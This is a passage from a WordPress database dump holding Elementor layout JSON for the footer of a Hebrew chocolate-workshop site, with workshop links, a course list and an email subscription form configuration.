\\u05dc\\u05de\\u05ea\\u05d7\\u05d9\\u05dc\\u05d9\\u05dd\",\"icon\":\"\",\"_id\":\"30a3b9f\",\"link\":{\"url\":\"\",\"is_external\":\"\",\"nofollow\":\"\"}}],\"space_between\":{\"unit\":\"px\",\"size\":5},\"icon_size\":{\"unit\":\"px\",\"size\":6},\"text_color\":\"#ffffff\",\"text_indent\":{\"unit\":\"px\",\"size\":0},\"icon_typography_typography\":\"custom\",\"icon_typography_font_size\":{\"unit\":\"px\",\"size\":14},\"icon_typography_font_weight\":\"300\",\"icon_typography_font_size_tablet\":{\"unit\":\"px\",\"size\":13}},\"elements\":[],\"widgetType\":\"icon-list\"}],\"isInner\":true},{\"id\":\"24484b98\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":49.999,\"_inline_size_tablet\":100,\"margin_tablet\":{\"unit\":\"px\",\"top\":\"60\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false},\"margin_mobile\":{\"unit\":\"px\",\"top\":\"40\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false},\"padding_tablet\":{\"unit\":\"%\",\"top\":\"0\",\"right\":\"20\",\"bottom\":\"0\",\"left\":\"20\",\"isLinked\":false},\"padding_mobile\":{\"unit\":\"px\",\"top\":\"10\",\"right\":\"10\",\"bottom\":\"10\",\"left\":\"10\",\"isLinked\":true}},\"elements\":[{\"id\":\"33814887\",\"elType\":\"widget\",\"settings\":{\"title\":\"\\u05dc\\u05d3\\u05e2\\u05ea \\u05de\\u05ea\\u05d9 \\u05d4\\u05e1\\u05d3\\u05e0\\u05d4 \\u05d4\\u05d1\\u05d0\\u05d4\",\"title_color\":\"#edd0a8\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":15},\"typography_font_weight\":\"600\",\"typography_text_transform\":\"uppercase\",\"header_size\":\"h4\",\"align_tablet\":\"center\",\"align_mobile\":\"left\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"48098d8\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p>\\u05e8\\u05d5\\u05e6\\u05d9\\u05dd \\u05dc\\u05d3\\u05e2\\u05ea \\u05de\\u05ea\\u05d9 \\u05d4\\u05e1\\u05d3\\u05e0\\u05d4 \\u05d4\\u05d1\\u05d0\\u05d4 (\\u05dc\\u05dc\\u05d0 \\u05d4\\u05ea\\u05d7\\u05d9\\u05d9\\u05d1\\u05d5\\u05ea \\/ \\u05e1\\u05e4\\u05d0\\u05dd \\/ \\u05d0\\u05db\\u05d9\\u05dc\\u05d5\\u05ea \\u05e8\\u05d0\\u05e9 \\u05de\\u05d9\\u05d5\\u05ea\\u05e8\\u05d5\\u05ea)? \\u05d1\\u05e9\\u05de\\u05d7\\u05d4, \\u05d4\\u05e9\\u05d0\\u05d9\\u05e8\\u05d5 \\u05de\\u05d9\\u05d9\\u05dc \\u05d5\\u05e0\\u05e9\\u05dc\\u05d7 \\u05dc\\u05db\\u05dd \\u05de\\u05d9\\u05d9\\u05dc <span style=\\\"text-decoration: underline;\\\"><strong>\\u05d0\\u05da \\u05d5\\u05e8\\u05e7<\\/strong><\\/span> \\u05db\\u05e9\\u05d9\\u05d4\\u05d9\\u05d4 \\u05ea\\u05d0\\u05e8\\u05d9\\u05da \\u05d7\\u05d3\\u05e9 \\u05dc\\u05e1\\u05d3\\u05e0\\u05d4 \\u05d4\\u05e7\\u05e8\\u05d5\\u05d1\\u05d4<\\/p>\",\"text_color\":\"#ffffff\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":14},\"typography_font_weight\":\"300\",\"align_tablet\":\"center\",\"align_mobile\":\"left\"},\"elements\":[],\"widgetType\":\"text-editor\"},{\"id\":\"f32a997\",\"elType\":\"widget\",\"settings\":{\"form_name\":\"New Form\",\"form_fields\":[{\"_id\":\"email\",\"field_type\":\"email\",\"required\":\"true\",\"field_label\":\"Email\",\"placeholder\":\"\\u05de\\u05d4 \\u05d4\\u05de\\u05d9\\u05d9\\u05dc \\u05e9\\u05dc\\u05da?\",\"width\":\"66\",\"field_value\":\"\",\"file_sizes\":\"\",\"file_types\":\"\",\"allow_multiple_upload\":\"\",\"max_files\":\"\",\"acceptance_text\":\"\",\"checked_by_default\":\"\",\"field_min\":\"\",\"field_max\":\"\",\"min_date\":\"\",\"max_date\":\"\",\"use_native_date\":\"\",\"use_native_time\":\"\",\"field_options\":\"\",\"allow_multiple\":\"\",\"select_size\":\"\",\"inline_list\":\"\",\"field_html\":\"\",\"width_tablet\":\"\",\"width_mobile\":\"\",\"rows\":4,\"recaptcha_size\":\"normal\",\"recaptcha_style\":\"light\",\"css_classes\":\"\",\"custom_id\":\"email\"}],\"show_labels\":\"\",\"button_text\":\"Subscribe\",\"button_width\":\"33\",\"email_content\":\"[all-fields]\",\"email_content_2\":\"[all-fields]\",\"success_message\":\"The form was sent successfully!\",\"error_message\":\"Please fill in the required fields.\",\"required_field_message\":\"Required\",\"invalid_message\":\"There\'s something wrong. The form is invalid.\",\"column_gap\":{\"unit\":\"px\",\"size\":0},\"row_gap\":{\"unit\":\"px\",\"size\":0},\"label_color\":\"#ffffff\",\"label_typography_typography\":\"custom\",\"label_typography_font_size\":{\"unit\":\"px\",\"size\":12},\"field_text_color\":\"#000000\",\"field_typography_typography\":\"custom\",\"field_typography_font_size\":{\"unit\":\"px\",\"size\":14},\"field_typography_font_weight\":\"300\",\"field_border_width\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false},\"field_border_radius\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":true},\"button_background_color\":\"#edd0a8\",\"button_text_color\":\"#ffffff\",\"button_typography_typography\":\"custom\",\"button_typography_font_size\":{\"unit\":\"px\",\"size\":14},\"button_typography_font_weight\":\"600\",\"button_typography_text_transform\":\"uppercase\",\"button_border_radius\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":true},\"button_background_hover_color\":\"#ed8a00\",\"button_hover_color\":\"#ffffff\",\"input_size\":\"md\",\"button_size\":\"md\",\"email_to\":\"shmulik@shmul.co.il\",\"email_subject\":\"New message from \\\"\\u05e1\\u05d3\\u05e0\\u05d0\\u05d5\\u05ea \\u05e9\\u05d5\\u05e7\\u05d5\\u05dc\\u05d3\\\"\",\"email_from\":\"email@chocoded.co.il\",\"email_from_name\":\"\\u05e1\\u05d3\\u05e0\\u05d0\\u05d5\\u05ea \\u05e9\\u05d5\\u05e7\\u05d5\\u05dc\\u05d3\",\"email_to_2\":\"shmulik@shmul.co.il\",\"email_subject_2\":\"New message from \\\"\\u05e1\\u05d3\\u05e0\\u05d0\\u05d5\\u05ea \\u05e9\\u05d5\\u05e7\\u05d5\\u05dc\\u05d3\\\"\",\"email_from_2\":\"email@chocoded.co.il\",\"email_from_name_2\":\"\\u05e1\\u05d3\\u05e0\\u05d0\\u05d5\\u05ea \\u05e9\\u05d5\\u05e7\\u05d5\\u05dc\\u05d3\",\"email_reply_to_2\":\"shmulik@shmul.co.il\"},\"elements\":[],\"widgetType\":\"form\"}],\"isInner\":true}],\"isInner\":true}],\"isInner\":false}],\"isInner\":false}]'),(634,140,'_elementor_version','0.4'),(636,141,'_elementor_template_type','page'),(637,141,'_elementor_edit_mode','builder'),(638,142,'_elementor_template_type','page'),(639,142,'_elementor_edit_mode','builder'),(640,141,'_wp_page_template','default'),(641,141,'_elementor_data','[{\"id\":\"43f8ef8f\",\"elType\":\"section\",\"settings\":{\"content_position\":\"middle\",\"background_background\":\"gradient\",\"background_color\":\"#575860\",\"margin\":{\"unit\":\"px\",\"top\":\"\",\"right\":0,\"bottom\":\"\",\"left\":0,\"isLinked\":true},\"padding\":{\"unit\":\"px\",\"top\":\"70\",\"right\":\"0\",\"bottom\":\"20\",\"left\":\"0\",\"isLinked\":false},\"padding_tablet\":{\"unit\":\"px\",\"top\":\"50\",\"right\":\"20\",\"bottom\":\"20\",\"left\":\"20\",\"isLinked\":false},\"padding_mobile\":{\"unit\":\"px\",\"top\":\"40\",\"right\":\"15\",\"bottom\":\"20\",\"left\":\"15\",\"isLinked\":false},\"background_color_b\":\"#3a3a3a\",\"background_gradient_angle\":{\"unit\":\"deg\",\"size\":360},\"border_border\":\"solid\",\"border_width\":{\"unit\":\"px\",\"top\":\"10\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false},\"border_color\":\"#edd0a8\"},\"elements\":[{\"id\":\"39181ab4\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"_inline_size\":null,\"padding_mobile\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[{\"id\":\"10694622\",\"elType\":\"section\",\"settings\":{\"structure\":\"30\"},\"elements\":[{\"id\":\"5212b57b\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":25,\"_inline_size_tablet\":33,\"_inline_size_mobile\":33},\"elements\":[{\"id\":\"2b9dc682\",\"elType\":\"widget\",\"settings\":{\"title\":\"\\u05e1\\u05d3\\u05e0\\u05d0\\u05d5\\u05ea \\u05e9\\u05d5\\u05e7\\u05d5\\u05dc\\u05d3\",\"title_color\":\"#edd0a8\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":15},\"typography_font_weight\":\"600\",\"typography_text_transform\":\"uppercase\",\"header_size\":\"h4\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"50c468d5\",\"elType\":\"widget\",\"settings\":{\"icon_list\":[{\"text\":\"\\u05e1\\u05d3\\u05e0\\u05ea \\u05e9\\u05d5\\u05e7\\u05d5\\u05dc\\u05d3 \\u05d6\\u05d5\\u05d2\\u05d9\\u05ea\",\"icon\":\"\",\"_id\":\"a3a66d7\",\"link\":{\"url\":\"https:\\/\\/www.chocolate4u.co.il\\/%D7%A1%D7%93%D7%A0%D7%AA-%D7%A9%D7%95%D7%A7%D7%95%D7%9C%D7%93-%D7%96%D7%95%D7%92%D7%99%D7%AA\\/\",\"is_external\":\"\",\"nofollow\":\"\"}},{\"text\":\"\\u05e1\\u05d3\\u05e0\\u05ea \\u05e9\\u05d5\\u05e7\\u05d5\\u05dc\\u05d3 \\u05dc\\u05de\\u05e1\\u05d9\\u05d1\\u05ea \\u05e8\\u05d5\\u05d5\\u05e7\\u05d5\\u05ea\",\"icon\":\"\",\"_id\":\"7a91d3f\",\"link\":{\"url\":\"https:\\/\\/www.chocolate4u.co.il\\/%D7%A1%D7%93%D7%A0%D7%AA-%D7%A9%D7%95%D7%A7%D7%95%D7%9C%D7%93-%D7%9C%D7%9E%D7%A1%D7%99%D7%91%D7%AA-%D7%A8%D7%95%D7%95%D7%A7%D7%95%D7%AA\\/\",\"is_external\":\"\",\"nofollow\":\"\"}},{\"text\":\"\\u05e1\\u05d3\\u05e0\\u05ea \\u05e9\\u05d5\\u05e7\\u05d5\\u05dc\\u05d3 \\u05dc\\u05d7\\u05d1\\u05e8\\u05d5\\u05ea \\u05d5\\u05d0\\u05e8\\u05d2\\u05d5\\u05e0\\u05d9\\u05dd\",\"icon\":\"\",\"_id\":\"8c21433\",\"link\":{\"url\":\"https:\\/\\/www.chocolate4u.co.il\\/%D7%A1%D7%93%D7%A0%D7%AA-%D7%A9%D7%95%D7%A7%D7%95%D7%9C%D7%93-%D7%9C%D7%97%D7%91%D7%A8%D7%95%D7%AA\\/\",\"is_external\":\"\",\"nofollow\":\"\"}},{\"text\":\"\\u05e1\\u05d3\\u05e0\\u05ea \\u05e9\\u05d5\\u05e7\\u05d5\\u05dc\\u05d3 \\u05dc\\u05d9\\u05dc\\u05d3\\u05d9\\u05dd\",\"icon\":\"\",\"_id\":\"ad388f0\",\"link\":{\"url\":\"https:\\/\\/www.chocolate4u.co.il\\/%D7%A1%D7%93%D7%A0%D7%AA-%D7%A9%D7%95%D7%A7%D7%95%D7%9C%D7%93-%D7%9C%D7%99%D7%9C%D7%93%D7%99%D7%9D\\/\",\"is_external\":\"\",\"nofollow\":\"\"}}],\"space_between\":{\"unit\":\"px\",\"size\":5},\"icon_size\":{\"unit\":\"px\",\"size\":6},\"text_color\":\"#ffffff\",\"text_indent\":{\"unit\":\"px\",\"size\":0},\"icon_typography_typography\":\"custom\",\"icon_typography_font_size\":{\"unit\":\"px\",\"size\":14},\"icon_typography_font_weight\":\"300\",\"icon_typography_font_size_tablet\":{\"unit\":\"px\",\"size\":13}},\"elements\":[],\"widgetType\":\"icon-list\"}],\"isInner\":true},{\"id\":\"45bcecca\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":25,\"_inline_size_tablet\":33,\"_inline_size_mobile\":33},\"elements\":[{\"id\":\"37f8a4fc\",\"elType\":\"widget\",\"settings\":{\"title\":\"\\u05e7\\u05d5\\u05e8\\u05e1\\u05d9\\u05dd \\u05e2\\u05dd \\u05e9\\u05d5\\u05e7\\u05d5\\u05dc\\u05d3\",\"title_color\":\"#edd0a8\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":15},\"typography_font_weight\":\"600\",\"typography_text_transform\":\"uppercase\",\"header_size\":\"h4\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"285e10d7\",\"elType\":\"widget\",\"settings\":{\"icon_list\":[{\"text\":\"\\u05e7\\u05d5\\u05e8\\u05e1 \\u05e4\\u05e8\\u05dc\\u05d9\\u05e0\\u05d9\\u05dd\",\"icon\":\"\",\"_id\":\"a3a66d7\",\"link\":{\"url\":\"\",\"is_external\":\"\",\"nofollow\":\"\"}},{\"text\":\"\\u05e7\\u05d5\\u05e8\\u05e1 \\u05e9\\u05d5\\u05e7\\u05d5\\u05dc\\u05d8\\u05d9\\u05d9\\u05e8\\u05d9\\u05dd\",\"icon\":\"\",\"_id\":\"a70e4bf\",\"link\":{\"url\":\"\",\"is_external\":\"\",\"nofollow\":\"\"}},{\"text\":\"\\u05e7\\u05d5\\u05e8\\u05e1 \\u05e9\\u05d5\\u05e7\\u05d5\\u05dc\\u05d3 \\u05dc\\u05de\\u05ea\\u05d7\\u05d9\\u05dc\\u05d9\\u05dd\",\"icon\":\"\",\"_id\":\"30a3b9f\",\"link\":{\"url\":\"\",\"is_external\":\"\",\"nofollow\":\"\"}}],\"space_between\":{\"unit\":\"px\",\"size\":5},\"icon_size\":{\"unit\":\"px\",\"size\":6},\"text_color\":\"#ffffff\",\"text_indent\":{\"unit\":\"px\",\"size\":0},\"icon_typography_typography\":\"custom\",\"icon_typography_font_size\":{\"unit\":\"px\",\"size\":14},\"icon_typography_font_weight\":\"300\",\"icon_typography_font_size_tablet\":{\"unit\":\"px\",\"size\":13}},\"elements\":[],\"widgetType\":\"icon-list\"}],\"isInner\":true},{\"id\":\"24484b98\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":49.999,\"_inline_size_tablet\":100,\"margin_tablet\":{\"unit\":\"px\",\"top\":\"60\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false},\"margin_mobile\":{\"unit\":\"px\",\"top\":\"40\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false},\"padding_tablet\":{\"unit\":\"%\",\"top\":\"0\",\"right\":\"20\",\"bottom\":\"0\",\"left\":\"20\",\"isLinked\":false},\"padding_mobile\":{\"unit\":\"px\",\"top\":\"10\",\"right\":\"10\",\"bottom\":\"10\",\"left\":\"10\",\"isLinked\":true}},\"elements\":[{\"id\":\"33814887\",\"elType\":\"widget\",\"settings\":{\"title\":\"\\u05dc\\u05d3\\u05e2\\u05ea \\u05de\\u05ea\\u05d9 \\u05d4\\u05e1\\u05d3\\u05e0\\u05d4 \\u05d4\\u05d1\\u05d0\\u05d4\",\"title_color\":\"#edd0a8\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":15},\"typography_font_weight\":\"600\",\"typography_text_transform\":\"uppercase\",\"header_size\":\"h4\",\"align_tablet\":\"center\",\"align_mobile\":\"left\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"48098d8\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p>\\u05e8\\u05d5\\u05e6\\u05d9\\u05dd \\u05dc\\u05d3\\u05e2\\u05ea \\u05de\\u05ea\\u05d9 \\u05d4\\u05e1\\u05d3\\u05e0\\u05d4 \\u05d4\\u05d1\\u05d0\\u05d4 (\\u05dc\\u05dc\\u05d0 \\u05d4\\u05ea\\u05d7\\u05d9\\u05d9\\u05d1\\u05d5\\u05ea \\/ \\u05e1\\u05e4\\u05d0\\u05dd \\/ \\u05d0\\u05db\\u05d9\\u05dc\\u05d5\\u05ea \\u05e8\\u05d0\\u05e9 \\u05de\\u05d9\\u05d5\\u05ea\\u05e8\\u05d5\\u05ea)? \\u05d1\\u05e9\\u05de\\u05d7\\u05d4, \\u05d4\\u05e9\\u05d0\\u05d9\\u05e8\\u05d5 \\u05de\\u05d9\\u05d9\\u05dc \\u05d5\\u05e0\\u05e9\\u05dc\\u05d7 \\u05dc\\u05db\\u05dd \\u05de\\u05d9\\u05d9\\u05dc <span style=\\\"text-decoration: underline;\\\"><strong>\\u05d0\\u05da \\u05d5\\u05e8\\u05e7<\\/strong><\\/span> \\u05db\\u05e9\\u05d9\\u05d4\\u05d9\\u05d4 \\u05ea\\u05d0\\u05e8\\u05d9\\u05da \\u05d7\\u05d3\\u05e9 \\u05dc\\u05e1\\u05d3\\u05e0\\u05d4 \\u05d4\\u05e7\\u05e8\\u05d5\\u05d1\\u05d4<\\/p>\",\"text_color\":\"#ffffff\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":14},\"typography_font_weight\":\"300\",\"align_tablet\":\"center\",\"align_mobile\":\"left\"},\"elements\":[],\"widgetType\":\"text-editor\"},{\"id\":\"f32a997\",\"elType\":\"widget\",\"settings\":{\"form_name\":\"New Form\",\"form_fields\":[{\"_id\":\"email\",\"field_type\":\"email\",\"required\":\"true\",\"field_label\":\"Email\",\"placeholder\":\"\\u05de\\u05d4 \\u05d4\\u05de\\u05d9\\u05d9\\u05dc \\u05e9\\u05dc\\u05da?\",\"width\":\"66\",\"field_value\":\"\",\"file_sizes\":\"\",\"file_types\":\"\",\"allow_multiple_upload\":\"\",\"max_files\":\"\",\"acceptance_text\":\"\",\"checked_by_default\":\"\",\"field_min\":\"\",\"field_max\":\"\",\"min_date\":\"\",\"max_date\":\"\",\"use_native_date\":\"\",\"use_native_time\":\"\",\"field_options\":\"\",\"allow_multiple\":\"\",\"select_size\":\"\",\"inline_list\":\"\",\"field_html\":\"\",\"width_tablet\":\"\",\"width_mobile\":\"\",\"rows\":4,\"recaptcha_size\":\"normal\",\"recaptcha_style\":\"light\",\"css_classes\":\"\",\"custom_id\":\"email\"}],\"show_labels\":\"\",\"button_text\":\"Subscribe\",\"button_width\":\"33\",\"email_content\":\"[all-fields]\",\"email_content_2\":\"[all-fields]\",\"success_message\":\"The form was sent successfully!\",\"error_message\":\"Please fill in the required fields.\",\"required_field_message\":\"Required\",\"invalid_message\":\"There\'s something wrong. The form is invalid.\",\"column_gap\":{\"unit\":\"px\",\"size\":0},\"row_gap\":{\"unit\":\"px\",\"size\":0},\"label_color\":\"#ffffff\",\"label_typography_typography\":\"custom\",\"label_typography_font_size\":{\"unit\":\"px\",\"size\":12},\"field_text_color\":\"#000000\",\"field_typography_typography\":\"custom\",\"field_typography_font_size\":{\"unit\":\"px\",\"size\":14},\"field_typography_font_weight\":\"300\",\"field_border_width\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false},\"field_border_radius\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":true},\"button_background_color\":\"#edd0a8\",\"button_text_color\":\"#ffffff\",\"button_typography_typography\":\"custom\",\"button_typography_font_size\":{\"unit\":\"px\",\"size\":14},\"button_typography_font_weight\":\"600\",\"button_typography_text_transform\":\"uppercase\",\"button_border_radius\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":true},\"button_background_hover_color\":\"#ed8a00\",\"button_hover_color\":\"#ffffff\",\"input_size\":\"md\",\"button_size\":\"md\",\"email_to\":\"shmulik@shmul.co.il\",\"email_subject\":\"New message from \\\"\\u05e1\\u05d3\\u05e0\\u05d0\\u05d5\\u05ea \\u05e9\\u05d5\\u05e7\\u05d5\\u05dc\\u05d3\\\"\",\"email_from\":\"email@chocoded.co.il\",\"email_from_name\":\"\\u05e1\\u05d3\\u05e0\\u05d0\\u05d5\\u05ea \\u05e9\\u05d5\\u05e7\\u05d5\\u05dc\\u05d3\",\"email_to_2\":\"shmulik@shmul.co.il\",\"email_subject_2\":\"New message from \\\"\\u05e1\\u05d3\\u05e0\\u05d0\\u05d5\\u05ea \\u05e9\\u05d5\\u05e7\\u05d5\\u05dc\\u05d3\\\"\",\"email_from_2\":\"email@chocoded.co.il\",\"email_from_name_2\":\"\\u05e1\\u05d3\\u05e0\\u05d0\\u05d5\\u05ea \\u05e9\\u05d5\\u05e7\\u05d5\\u05dc\\u05d3\",\"email_reply_to_2\":\"shmulik@shmul.co.il\"},\"elements\":[],\"widgetType\":\"form\"}],\"isInner\":true}],\"isInner\":true}],\"isInner\":false}],\"isInner\":false}]'),(642,143,'_elementor_template_type','page'),(643,143,'_elementor_edit_mode','builder'),(644,143,'_wp_page_template','default'),(645,143,'_elementor_data','[{\"id\":\"43f8ef8f\",\"elType\":\"section\",\"settings\":{\"content_position\":\"middle\",\"background_background\":\"gradient\",\"background_color\":\"#575860\",\"margin\":{\"unit\":\"px\",\"top\":\"\",\"right\":0,\"bottom\":\"\",\"left\":0,\"isLinked\":true},\"padding\":{\"unit\":\"px\",\"top\":\"70\",\"right\":\"0\",\"bottom\":\"20\",\"left\":\"0\",\"isLinked\":false},\"padding_tablet\":{\"unit\":\"px\",\"top\":\"50\",\"right\":\"20\",\"bottom\":\"20\",\"left\":\"20\",\"isLinked\":false},\"padding_mobile\":{\"unit\":\"px\",\"top\":\"40\",\"right\":\"15\",\"bottom\":\"20\",\"left\":\"15\",\"isLinked\":false},\"background_color_b\":\"#3a3a3a\",\"background_gradient_angle\":{\"unit\":\"deg\",\"size\":360},\"border_border\":\"solid\",\"border_width\":{\"unit\":\"px\",\"top\":\"10\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false},\"border_color\":\"#edd0a8\"},\"elements\":[{\"id\":\"39181ab4\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"_inline_size\":null,\"padding_mobile\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[{\"id\":\"10694622\",\"elType\":\"section\",\"settings\":{\"structure\":\"30\"},\"elements\":[{\"id\":\"5212b57b\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":25,\"_inline_size_tablet\":33,\"_inline_size_mobile\":33},\"elements\":[{\"id\":\"2b9dc682\",\"elType\":\"widget\",\"settings\":{\"title\":\"\\u05e1\\u05d3\\u05e0\\u05d0\\u05d5\\u05ea \\u05e9\\u05d5\\u05e7\\u05d5\\u05dc\\u05d3\",\"title_color\":\"#edd0a8\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":15},\"typography_font_weight\":\"600\",\"typography_text_transform\":\"uppercase\",\"header_size\":\"h4\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"50c468d5\",\"elType\":\"widget\",\"settings\":{\"icon_list\":[{\"text\":\"\\u05e1\\u05d3\\u05e0\\u05ea \\u05e9\\u05d5\\u05e7\\u05d5\\u05dc\\u05d3 \\u05d6\\u05d5\\u05d2\\u05d9\\u05ea\",\"icon\":\"\",\"_id\":\"a3a66d7\",\"link\":{\"url\":\"https:\\/\\/www.chocolate4u.co.il\\/%D7%A1%D7%93%D7%A0%D7%AA-%D7%A9%D7%95%D7%A7%D7%95%D7%9C%D7%93-%D7%96%D7%95%D7%92%D7%99%D7%AA\\/\",\"is_external\":\"\",\"nofollow\":\"\"}},{\"text\":\"\\u05e1\\u05d3\\u05e0\\u05ea \\u05e9\\u05d5\\u05e7\\u05d5\\u05dc\\u05d3 \\u05dc\\u05de\\u05e1\\u05d9\\u05d1\\u05ea \\u05e8\\u05d5\\u05d5\\u05e7\\u05d5\\u05ea\",\"icon\":\"\",\"_id\":\"7a91d3f\",\"link\":{\"url\":\"https:\\/\\/www.chocolate4u.co.il\\/%D7%A1%D7%93%D7%A0%D7%AA-%D7%A9%D7%95%D7%A7%D7%95%D7%9C%D7%93-%D7%9C%D7%9E%D7%A1%D7%99%D7%91%D7%AA-%D7%A8%D7%95%D7%95%D7%A7%D7%95%D7%AA\\/\",\"is_external\":\"\",\"nofollow\":\"\"}},{\"text\":\"\\u05e1\\u05d3\\u05e0\\u05ea \\u05e9\\u05d5\\u05e7\\u05d5\\u05dc\\u05d3 \\u05dc\\u05d7\\u05d1\\u05e8\\u05d5\\u05ea \\u05d5\\u05d0\\u05e8\\u05d2\\u05d5\\u05e0\\u05d9\\u05dd\",\"icon\":\"\",\"_id\":\"8c21433\",\"link\":{\"url\":\"https:\\/\\/www.chocolate4u.co.il\\/%D7%A1%D7%93%D7%A0%D7%AA-%D7%A9%D7%95%D7%A7%D7%95%D7%9C%D7%93-%D7%9C%D7%97%D7%91%D7%A8%D7%95%D7%AA\\/\",\"is_external\":\"\",\"nofollow\":\"\"}},{\"text\":\"\\u05e1\\u05d3\\u05e0\\u05ea \\u05e9\\u05d5\\u05e7\\u05d5\\u05dc\\u05d3 \\u05dc\\u05d9\\u05dc\\u05d3\\u05d9\\u05dd\",\"icon\":\"\",\"_id\":\"ad388f0\",\"link\":{\"url\":\"https:\\/\\/www.chocolate4u.co.il\\/%D7%A1%D7%93%D7%A0%D7%AA-%D7%A9%D7%95%D7%A7%D7%95%D7%9C%D7%93-%D7%9C%D7%99%D7%9C%D7%93%D7%99%D7%9D\\/\",\"is_external\":\"\",\"nofollow\":\"\"}}],\"space_between\":{\"unit\":\"px\",\"size\":5},\"icon_size\":{\"unit\":\"px\",\"size\":6},\"text_color\":\"#ffffff\",\"text_indent\":{\"unit\":\"px\",\"size\":0},\"icon_typography_typography\":\"custom\",\"icon_typography_font_size\":{\"unit\":\"px\",\"size\":14},\"icon_typography_font_weight\":\"300\",\"icon_typography_font_size_tablet\":{\"unit\":\"px\",\"size\":13}},\"elements\":[],\"widgetType\":\"icon-list\"}],\"isInner\":true},{\"id\":\"45bcecca\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":25,\"_inline_size_tablet\":33,\"_inline_size_mobile\":33},\"elements\":[{\"id\":\"37f8a4fc\",\"elType\":\"widget\",\"settings\":{\"title\":\"\\u05e7\\u05d5\\u05e8\\u05e1\\u05d9\\u05dd \\u05e2\\u05dd \\u05e9\\u05d5\\u05e7\\u05d5\\u05dc\\u05d3\",\"title_color\":\"#edd0a8\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":15},\"typography_font_weight\":\"600\",\"typography_text_transform\":\"uppercase\",\"header_size\":\"h4\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"285e10d7\",\"elType\":\"widget\",\"settings\":{\"icon_list\":[{\"text\":\"\\u05e7\\u05d5\\u05e8\\u05e1 \\u05e4\\u05e8\\u05dc\\u05d9\\u05e0\\u05d9\\u05dd\",\"icon\":\"\",\"_id\":\"a3a66d7\",\"link\":{\"url\":\"\",\"is_external\":\"\",\"nofollow\":\"\"}},{\"text\":\"\\u05e7\\u05d5\\u05e8\\u05e1 \\u05e9\\u05d5\\u05e7\\u05d5\\u05dc\\u05d8\\u05d9\\u05d9\\u05e8\\u05d9\\u05dd\",\"icon\":\"\",\"_id\":\"a70e4bf\",\"link\":{\"url\":\"\",\"is_external\":\"\",\"nofollow\":\"\"}},{\"text\":\"\\u05e7\\u05d5\\u05e8\\u05e1 \\u05e9\\u05d5\\u05e7\\u05d5\\u05dc\\u05d3 \\u05dc\\u05de\\u05ea\\u05d7\\u05d9\\u05dc\\u05d9\\u05dd\",\"icon\":\"\",\"_id\":\"30a3b9f\",\"link\":{\"url\":\"\",\"is_external\":\"\",\"nofollow\":\"\"}}],\"space_between\":{\"unit\":\"px\",\"size\":5},\"icon_size\":{\"unit\":\"px\",\"size\":6},\"text_color\":\"#ffffff\",\"text_indent\":{\"unit\":\"px\",\"size\":0},\"icon_typography_typography\":\"custom\",\"icon_typography_font_size\":{\"unit\":\"px\",\"size\":14},\"icon_typography_font_weight\":\"300\",\"icon_typography_font_size_tablet\":{\"unit\":\"px\",\"size\":13}},\"elements\":[],\"widgetType\":\"icon-list\"}],\"isInner\":true},{\"id\":\"24484b98\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":49.999,\"_inline_size_tablet\":100,\"margin_tablet\":{\"unit\":\"px\",\"top\":\"60\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false},\"margin_mobile\":{\"unit\":\"px\",\"top\":\"40\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false},\"padding_tablet\":{\"unit\":\"%\",\"top\":\"0\",\"right\":\"20\",\"bottom\